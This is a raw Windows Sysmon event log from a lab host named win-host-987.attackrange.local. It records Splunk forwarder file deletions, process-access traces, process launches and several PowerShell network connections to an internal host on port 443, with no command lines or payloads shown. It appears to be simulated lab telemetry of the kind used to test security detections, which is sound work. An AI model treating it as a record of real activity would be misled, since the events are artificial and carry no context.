Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FD43A3BEB5770E28678AC2251049DFA,SHA256=67858B9F80898D102E9ED21E4312F6CFFAC3F78A434B135CB985492E7B4A188B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:13.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E017D8F8C9DE46C5437480C5E782C60,SHA256=32EC00C326870A3AF80EAC9E4B58AAA09C206FCA4DF18231A775B52D84A06142,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:14.788{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6A41210F5D053312D9F5737848B662C,SHA256=AB77AD55D7705662D8B155D28FE0AAB423227AE81FABFAD393BBF12A2EB629F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:14.574{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=20C10C20D774DDC3D55714E4F97BB68E,SHA256=FD55DCD236CDCB4CA304D63D62BE97829384CF97DC975E6B9E88A8FEA5CBD47E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:15.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=042B51F89961DB8C78788C218696C953,SHA256=3113BA06A4065DE0551D107D4B294636D26257841C517B373DED0B91627BF9BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:45.049{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50653-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:16.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B509994539DEE1F4BEABF3E63F1132B1,SHA256=62B789C35A2D5AB24E8DBD5356DCD3F5A0B8CE6E46A1FC1C1CF0B4A3FA5659F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:17.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE2A691331CDC1DB9318395EFC87BAE2,SHA256=4AC8A1E1F9A196C58B127F8A3B7822F48768D578A9C5034DD3491A036307228B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:18.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=885D510A375EFADD7C4AA0555845BE13,SHA256=8BD36863A065EFA2A712206E5794BF40F04980E344363CEBE9063ECD6E5DFAA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:18.584{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0193D92B7E393D89F0A50907983B0B94,SHA256=9460BB567D9A9DA1D8656CF7EA60B60D9E1A2EB6FE5AE80E18FA237E030DADEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:47.807{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50654-false10.0.1.12-8000- 23542300x800000000000000036498529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:19.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A06F2B26F08225012F2F68A93A841B2,SHA256=A0BAAEC1BFDD7CF583216D1CAD11F1A6AE7644E5891E330B364EE3B5E836B609,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:49.059{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50655-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:20.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9241B94C7D579EDA5547ADDD0B01577E,SHA256=BBAF1135CC657FF96BF30ADF88ED3D3183557511D596E243DDBF1FE608EBCD61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:21.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEBE90CE5076F45C4FB395DF18CC7876,SHA256=A9BF6547D7B24384B0EAED5076F49F23A2B8CE219D041A29787B22083AC872CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:22.585{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=917BEFA72354228FA466EF531B02E2ED,SHA256=18AC2A4C7C1E69F5F0D5FAB7DCBFBA4DE7DC75BA1375BC8509BACCF0B474FBF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:53.823{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50657-false10.0.1.12-8000- 354300x800000000000000036498535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:53.072{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50656-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:23.268{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=8DD7FD975E5D6634D1483FE687D0A1FD,SHA256=7D55C7A5DB52DC0F7C6E451478F092E6237B1EFDF69ECE74587C8C32C11F66EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:23.000{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63BE8090D00D5E25DD9DB2A0ADA7422F,SHA256=8E8E3C4D9157D2ED6B22E939ABACC8BE671E799006702E129A938DE1E677B743,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.951{B81B27B7-A210-6140-AF56-04000000C801}69085468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.798{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A210-6140-AF56-04000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.798{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.798{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.798{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.798{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.798{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A210-6140-AF56-04000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.798{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A210-6140-AF56-04000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.783{B81B27B7-A210-6140-AF56-04000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036498545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.099{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A210-6140-AE56-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.099{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.099{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.099{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.099{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.099{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A210-6140-AE56-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.099{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A210-6140-AE56-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.084{B81B27B7-A210-6140-AE56-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:24.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EBDAA35298ABE82763CC8EDD8FE3383,SHA256=44F4D96E826E0828B21716FFAC82E4FEF28B556CEF50E9478F53E1051D8576E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:25.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D8FB8FA30E18168A973E8C2C68CE70B,SHA256=FE1FCFE0DA669C614E8ACA9352FFDAB9C9DDDB60DBB3CFD9381567A083C48B12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:25.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 